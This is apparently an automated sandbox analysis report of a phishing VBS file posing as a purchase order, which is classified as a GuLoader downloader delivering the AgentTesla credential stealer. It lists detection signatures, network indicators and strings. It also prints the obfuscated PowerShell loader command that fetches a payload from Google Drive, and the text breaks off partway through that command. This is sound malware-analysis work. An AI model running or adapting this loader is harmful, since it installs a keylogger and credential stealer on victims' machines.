Windows Analysis Report
Texas_Tool_Purchase_Order#T18834-1.vbs

Overview

General Information

Sample name:	Texas_Tool_Purchase_Order#T18834-1.vbs
Analysis ID:	1430129
MD5:	85bb05a80334099ded83e21dd686c567
SHA1:	308f10b6208abf4a9c92736c80b6dcb01ca332d2
SHA256:	46d29ed35c7ca72d44d99f3d12603cd11435b6388bf61cd9988e7d375ddbb7b5
Tags:	vbs
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

VBScript performs obfuscated calls to suspicious functions

Yara detected AgentTesla

Yara detected GuLoader

Found suspicious powershell code related to unpacking or dynamic code loading

Installs a global keyboard hook

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation STDIN+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware

Multi AV Scanner detection for submitted file

Source: Texas_Tool_Purchase_Order#T18834-1.vbs	ReversingLabs: Detection: 26%
Source: Texas_Tool_Purchase_Order#T18834-1.vbs	Virustotal: Detection: 30%			Perma Link

Source: unknown	HTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.64.97:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.64.97:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49716 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2422882489.000000000870D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2411714026.0000000002F7F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb.ene source: powershell.exe, 00000005.00000002.2418986473.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2418986473.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdbeW: source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbS source: powershell.exe, 00000005.00000002.2422882489.000000000870D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49717 -> 66.29.159.53:587

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 66.29.159.53 66.29.159.53

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Uses SMTP (mail sending)

Source: global traffic

TCP traffic: 192.168.2.5:49717 -> 66.29.159.53:587

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C58A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2687361282.000001D6D36DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C3671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2413115554.0000000004AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp.privateemail.com
Source: powershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C3671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2413115554.0000000004AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C56AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C56AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C3898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: wab.exe, 00000008.00000002.3277379903.0000000000508000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/5m
Source: wab.exe, 00000008.00000002.3277379903.0000000000508000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/mmH
Source: wab.exe, 00000008.00000002.3277379903.0000000000540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57
Source: wab.exe, 00000008.00000002.3277379903.0000000000540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57-
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C3898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMWP
Source: powershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMWXRll
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C3BAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: wab.exe, 00000008.00000002.3277379903.000000000056A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3277379903.0000000000540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57&export=download
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C3BAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW&export=download
Source: powershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C4BCD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2687361282.000001D6D36DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3277379903.000000000055C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3277379903.000000000055C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3277379903.000000000055C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714

Source: unknown	HTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.64.97:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.64.97:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49716 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

Jump to behavior

Creates a window with clipboard capturing capabilities

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_3012.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_344.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3012, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 344, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7452
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7452
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7452	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7452	Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed
